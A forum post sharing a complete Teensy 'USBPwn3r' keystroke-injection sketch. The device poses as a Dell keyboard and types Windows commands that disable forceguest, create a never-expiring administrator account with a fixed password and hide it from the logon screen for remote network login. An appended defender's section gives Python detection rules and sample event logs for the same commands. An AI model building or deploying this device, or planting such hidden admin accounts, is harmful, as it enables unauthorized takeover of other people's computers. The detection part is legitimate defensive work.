I used your library in my first ducky I dubbed the USBPwn3r:
Flickr Photo Set
Code:
/*
The following is Jon Marler's USBPwn3r proof-of-concept device for Teensy 2.0
Uses the PHUKD library from:
http://www.irongeek.com/i.php?page=securit...eystroke-dongle
To learn more about Teensyduino see:
http://www.pjrc.com/teensy/teensyduino.html
Look in arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_api.h for key definitions
Edit arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_private.h to change USB Vendor and Product ID
Compile Notes: Make sure you set the correct board type under Tools->Board, and the correct Tools->USB type as well
*/
#include "phukdlib.h"

// The setup() method runs once, when the sketch starts
void setup() {
  delay(20000);
  CommandAtRunBarMSWIN("cmd");
  delay(500);
  Keyboard.println("REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa /v forceguest /t REG_DWORD /d 00000000 /f");
  Keyboard.println("cls");
  Keyboard.println("NET USER IUSR_ADMIN P4ssw0rd! /ADD /active:yes /fullname:\"Built-in admin\" /expires:never /times:all");
  Keyboard.println("cls");
  Keyboard.println("NET LOCALGROUP Administrators IUSR_ADMIN /ADD");
  Keyboard.println("cls");
  Keyboard.println("REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /v IUSR_ADMIN /t REG_DWORD /d 00000000 /f");
  Keyboard.println("exit");
}

// the loop() method runs over and over again, checking for events
void loop()
{
}
The 20 second delay is to allow for Windows to add the device and activate it. I also modified the Teensy header files to use "Dell Keyboard" as the USB descriptor and changed the USB Vendor and Product IDs to match a Dell Keyboard.
The code is simple. It adds an administrator, and enables network login over the network for tools like Cain and Abel among others.
Using the PHUKD library made the code dead simple and easy to write. Thanks Irongeek!
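A defender's view of the sketch above, as an added example that is not part of the original post: detection logic that scans process-creation command lines for the four changes the sketch types in, and raises an alert when one account is created, added to Administrators and hidden from the logon screen in a short burst. The event records, rule names and five-minute window are constructed assumptions; the records imitate Windows event 4688 or Sysmon event 1 with command-line logging enabled.

```python
import re
from datetime import datetime, timedelta

# Constructed sample records (timestamp, command line); passwords masked.
SAMPLE_EVENTS = [
    ("2024-01-01T10:00:01", r'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v forceguest /t REG_DWORD /d 00000000 /f'),
    ("2024-01-01T10:00:02", r'NET USER IUSR_ADMIN ******** /ADD /active:yes'),
    ("2024-01-01T10:00:03", r'NET LOCALGROUP Administrators IUSR_ADMIN /ADD'),
    ("2024-01-01T10:00:04", r'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v IUSR_ADMIN /t REG_DWORD /d 00000000 /f'),
    ("2024-01-01T11:30:00", r'NET USER helpdesk2 ******** /ADD'),  # lone account creation
]

# One rule per change made by the sketch (rule names are hypothetical).
RULES = {
    "forceguest_off": re.compile(r'\breg(\.exe)?"?\s+add\s+.*\\control\\lsa"?\s.*/v\s+forceguest\b.*/d\s+0+\b', re.I),
    "user_created": re.compile(r'\bnet1?(\.exe)?"?\s+user\s+(?P<acct>\S+)\s.*?/add\b', re.I),
    "admin_added": re.compile(r'\bnet1?(\.exe)?"?\s+localgroup\s+"?administrators"?\s+(?P<acct>\S+)\s+/add\b', re.I),
    "account_hidden": re.compile(r'\breg(\.exe)?"?\s+add\s+.*\\specialaccounts\\userlist"?\s.*/v\s+(?P<acct>\S+)\s.*/d\s+0+\b', re.I),
}

def detect(events, window=timedelta(minutes=5)):
    """Return (hits, alerts): every rule match, plus accounts that were
    created, made administrator and hidden from the logon screen within `window`."""
    hits, per_acct = [], {}
    for ts, cmdline in events:
        when = datetime.fromisoformat(ts)
        for name, rx in RULES.items():
            m = rx.search(cmdline)
            if not m:
                continue
            acct = (m.groupdict().get("acct") or "").strip('"').lower()
            hits.append((ts, name, acct))
            if acct:
                per_acct.setdefault(acct, {})[name] = when
    alerts = []
    for acct, seen in per_acct.items():
        if {"user_created", "admin_added", "account_hidden"} <= seen.keys():
            if max(seen.values()) - min(seen.values()) <= window:
                alerts.append(acct)
    return hits, alerts

if __name__ == "__main__":
    hits, alerts = detect(SAMPLE_EVENTS)
    for hit in hits:
        print(hit)
    print("hidden admin accounts:", alerts)
```

Each rule is also worth alerting on by itself; the correlation step only separates the full create, elevate and hide sequence from routine account administration.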